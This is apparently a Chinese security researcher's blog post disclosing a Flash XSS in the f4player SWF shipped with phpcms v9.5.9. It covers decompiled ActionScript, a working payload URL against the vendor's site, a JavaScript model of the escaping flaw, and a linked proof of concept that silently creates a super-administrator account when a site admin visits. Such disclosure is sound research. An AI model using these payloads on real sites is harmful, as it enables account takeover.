Author: phithon
Team: SecBox team (安全盒子团队) www.secbox.cn
Blog: https://www.leavesongs.com
/statics/js/ckeditor/plugins/flashplayer/player/player.swf is a Flash file (the f4player) that phpcms added in its new release, v9.5.9.
Decompiled:
// Decompiled constructor of player.swf (f4player). The decompiler listing
// omitted the package and imports and was cut off before the two closing
// braces; both are restored here so the class is complete.
package {
    import flash.display.Loader;
    import flash.display.MovieClip;
    import flash.display.StageAlign;
    import flash.display.StageScaleMode;
    import flash.events.ContextMenuEvent;
    import flash.events.Event;
    import flash.external.ExternalInterface;
    import flash.net.URLRequest;
    import flash.net.navigateToURL;

    public class myPlayer extends MovieClip {
        public function myPlayer(){
            var stream:* = undefined;
            var streamname:* = undefined;
            var live:* = undefined;
            var subscribe:* = undefined;
            var video:* = undefined;
            var thumbnail:* = undefined;
            var autoplay:* = undefined;
            var fullscreen:* = undefined;
            var skin:* = undefined;
            var openLink:* = undefined;
            super();
            openLink = function (_arg1:ContextMenuEvent):void{
                navigateToURL(new URLRequest("http://gokercebeci.com/dev/f4player/?feature=player"));
            };
            stage.scaleMode = StageScaleMode.NO_SCALE;
            stage.align = StageAlign.TOP_LEFT;
            // Every value below comes from the flashvars; when the SWF is opened
            // directly by URL these are the query-string parameters, i.e. attacker-controlled.
            stream = this.loaderInfo.parameters.stream;
            streamname = this.loaderInfo.parameters.streamname;
            live = (this.loaderInfo.parameters.live == 1);
            subscribe = (this.loaderInfo.parameters.subscribe == 1);
            video = this.loaderInfo.parameters.video;
            thumbnail = this.loaderInfo.parameters.thumbnail;
            var skinfile:* = this.loaderInfo.parameters.skin;
            autoplay = (this.loaderInfo.parameters.autoplay == 1);
            fullscreen = this.loaderInfo.parameters.fullscreen;
            var skinEvent:* = function (_arg1:Event):void{
                skin = _arg1.currentTarget.content;
                stage.addChild(skin);
                ExternalInterface.call("console.log", "initializating ...");
                // The unvalidated stream parameter is handed straight to JavaScript.
                ExternalInterface.call("stream", stream);
                var _local2:* = new Player(stream, streamname, live, subscribe);
                skin.initialization(_local2, stage.stageWidth, stage.stageHeight, video, ((thumbnail) ? thumbnail : null), autoplay, fullscreen);
            };
            var sl:* = new Loader();
            // skinEvent only fires once the skin SWF has loaded successfully.
            sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);
            sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));
        }
    }
}
These lines are the important ones:
stream = this.loaderInfo.parameters.stream;
var skinfile:* = this.loaderInfo.parameters.skin;
var skinEvent:* = function (_arg1:Event):void{..ExternalInterface.call("stream", stream);..}
sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);
sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));
The first two lines read stream and skinfile from this.loaderInfo.parameters (the flashvars, which for a SWF opened directly by URL are simply the query-string parameters). The third defines a function skinEvent that calls ExternalInterface.call with stream as its second argument. The fourth registers skinEvent as the callback for the Event.COMPLETE event, and the fifth starts the load.
So the whole flow is:
The SWF is loaded, reads the skin parameter, loads the file it points to, and calls skinEvent once that load completes. skinEvent in turn calls ExternalInterface.call, which executes JavaScript in the hosting page, and its second argument (the stream parameter) is attacker-controlled.
ExternalInterface.call turns that argument into a quoted JavaScript string literal, and the Flash Player's escaping of that literal only handled the quote character, not a backslash placed in front of it. With the second argument under our control we can therefore break out of the literal, which gives us a Flash XSS.
Demo on the official site:
http://www.phpcms.cn/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//
Here skin=skin.swf supplies a skin that loads successfully so that the Event.COMPLETE callback actually fires, and the stream value URL-decodes to \"))}catch(e){alert(1)}//: the \" closes the quoted argument, )) closes the stream() call and the wrapper around it, } closes the try block that Flash wraps the call in, and alert(1) sits in a catch that runs because calling the undefined stream() function throws; // comments out the rest of the generated script.
Flash XSS is handier than other kinds of XSS because it is invisible to the browser's reflected-XSS filters (the XSS Auditor): the script is injected by the plugin at runtime through ExternalInterface rather than being reflected in the HTML response the filter inspects.
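The following is an added example, not code from this post, phpcms or f4player. It models in JavaScript how the Flash plugin turned ExternalInterface.call("stream", stream) into a script, why the demo payload above breaks out of it, and what correct marshalling of the argument would look like. The exact wrapper the plugin emitted, try { __flash__toXML(stream("…")) ; } catch (e) { "<undefined/>"; }, and the quote-only escaping are reconstructed from memory and are assumptions; the function names marshalVulnerable, marshalHardened, execute and demo are mine.

```javascript
// Added example: a model of Flash Player's ExternalInterface.call marshalling.
// The wrapper format below is an assumption reconstructed from memory, not
// taken from the phpcms page or from Adobe's source.

// Vulnerable marshalling (assumed): only double quotes are escaped, backslashes
// are not, so an attacker-supplied \" becomes \\" and terminates the literal.
function marshalVulnerable(fn, arg) {
  const escaped = String(arg).replace(/"/g, '\\"');
  return `try { __flash__toXML(${fn}("${escaped}")) ; } catch (e) { "<undefined/>"; }`;
}

// Hardened marshalling: emit a proper JavaScript string literal, so backslashes,
// quotes and control characters are all escaped and the argument stays data.
function marshalHardened(fn, arg) {
  return `try { __flash__toXML(${fn}(${JSON.stringify(String(arg))})) ; } catch (e) { "<undefined/>"; }`;
}

// Run the generated script the way the browser would: __flash__toXML exists,
// alert is stubbed to count invocations, and `stream` is deliberately NOT
// defined (the raw player.swf page defines no such function), so the call in
// the try block throws and whatever catch clause follows it is what runs.
function execute(js) {
  let alerts = 0;
  const alert = () => { alerts++; };
  const __flash__toXML = (x) => x;
  new Function('alert', '__flash__toXML', js)(alert, __flash__toXML);
  return alerts;
}

// The stream flashvar from the demo URL, after URL decoding (constructed input).
const PAYLOAD = '\\"))}catch(e){alert(1)}//';

// Returns how many times alert() fired under each marshalling scheme.
function demo() {
  return {
    vulnerable: execute(marshalVulnerable('stream', PAYLOAD)),
    hardened: execute(marshalHardened('stream', PAYLOAD)),
  };
}

// demo() -> { vulnerable: 1, hardened: 0 }
module.exports = { marshalVulnerable, marshalHardened, execute, PAYLOAD, demo };
```

Printing marshalVulnerable('stream', PAYLOAD) shows the generated script with the literal closed early by \\" and the player's own catch clause commented out, which is exactly the structure the payload in the demo URL relies on. The hardened variant keeps the same payload inside one string literal, so the only thing that runs is the plugin's own catch block.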
A POC that adds a back-end administrator:
http://mhz.pw/game/phpcms/frame.php?target=http://10.211.55.3/phpcms
Just change target to your own target. Once the target site's administrator visits the POC, a super administrator with username phithon and password 33444433 is created:
Can I just use the address above directly? Could you post a poc? Thanks, master!